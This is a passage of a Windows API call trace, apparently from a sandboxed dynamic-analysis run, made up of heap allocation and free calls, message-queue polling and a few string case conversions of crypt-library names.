[0035.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1b8 [0035.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0035.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0035.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0035.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0035.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x2926) returned 0x955018 [0035.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0035.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1c8 [0035.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0035.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0035.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0035.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1a8 [0035.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0035.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0035.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0035.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2e8 [0035.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0035.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0035.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0035.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8899d0 [0035.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0035.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0035.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0035.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0035.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0035.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x2926) returned 0x95a278 [0035.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0035.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0035.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0035.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0035.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0035.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0035.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0035.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0035.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0035.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0035.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0035.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0035.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0035.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0035.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0035.927] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0035.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0035.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0035.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0035.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0035.927] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0035.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0035.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0035.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0035.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0035.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0035.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0035.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0035.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0035.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0035.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0035.927] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0035.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0035.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0035.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0035.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da298 [0035.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0035.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0035.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0035.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0035.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889ac0 [0035.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0035.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0035.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0035.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0035.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0035.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0035.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0035.928] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0035.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0035.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0035.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0035.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0035.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0035.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0035.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0035.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0035.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0035.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0035.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0035.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0035.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0035.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0035.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0035.928] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0035.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0035.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0035.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0035.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0035.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0035.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0035.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0035.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0035.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0035.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0035.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0035.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0035.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0035.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0035.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0035.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0035.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0035.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0035.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0035.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0035.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0035.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0035.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0035.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0035.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0035.929] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0035.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0035.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0035.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0035.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0035.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0035.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0035.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0035.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0035.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0035.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0035.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0035.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0035.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0035.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0035.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0035.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0035.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0035.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0035.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0035.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0035.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0035.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0035.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0035.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0035.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0035.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0035.930] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0035.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0035.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0035.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0035.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0035.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0035.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2b8 [0035.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0035.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0035.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0035.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0035.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0035.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0035.931] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0035.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb50 [0035.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0035.931] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0035.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0035.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0035.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0035.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0035.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0035.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0035.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0035.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0035.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0035.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0035.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0035.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0035.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0035.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0035.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0035.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0035.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0035.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0035.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0035.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0035.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0035.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0035.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0035.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0035.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0035.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0035.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0035.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0035.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0035.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0035.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0035.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0035.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0035.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0035.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0035.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0035.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0035.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0035.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0035.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0035.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0035.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0035.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0035.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0035.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0035.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0035.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0035.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0035.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0035.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0035.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0035.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0035.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0035.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0035.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0035.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0035.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0035.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0035.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0035.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0035.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0035.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0035.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0035.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0035.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0035.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0035.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0035.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0035.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0035.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0035.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0035.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0035.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0035.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0035.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0035.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0035.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0035.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0035.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0035.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0035.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0035.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0035.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0035.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0035.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0035.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0035.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0035.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0035.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0035.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0035.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0035.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0035.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: 